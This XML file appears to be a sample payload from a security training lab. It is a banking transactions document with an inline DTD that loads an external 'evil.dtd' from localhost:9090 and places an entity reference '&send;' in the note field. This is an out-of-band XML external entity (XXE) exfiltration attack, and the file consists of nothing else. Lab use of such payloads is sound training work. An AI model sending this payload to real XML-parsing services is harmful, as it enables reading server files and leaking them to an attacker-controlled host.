<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE transactions [
        <!ELEMENT fromAccountNo (#PCDATA)>
        <!ELEMENT toAccountNo (#PCDATA)>
        <!ELEMENT amount (#PCDATA)>
        <!ELEMENT currency (#PCDATA)>
        <!ELEMENT note (#PCDATA)>
        <!ELEMENT transaction (fromAccountNo, toAccountNo, amount, currency, note)>
        <!ELEMENT transactions (transaction*)>
        <!ENTITY % victim SYSTEM 'http://localhost:9090/victim?outOfBand=true'>
        <!ENTITY % dtd SYSTEM "http://localhost:9090/xml/evil.dtd">
        %dtd;
        ]>
<transactions>
    <transaction>
        <fromAccountNo>1-123456-11</fromAccountNo>
        <toAccountNo>2-123456-22</toAccountNo>
        <amount>100</amount>
        <currency>CHF</currency>
        <note>&send;</note>
    </transaction>
</transactions>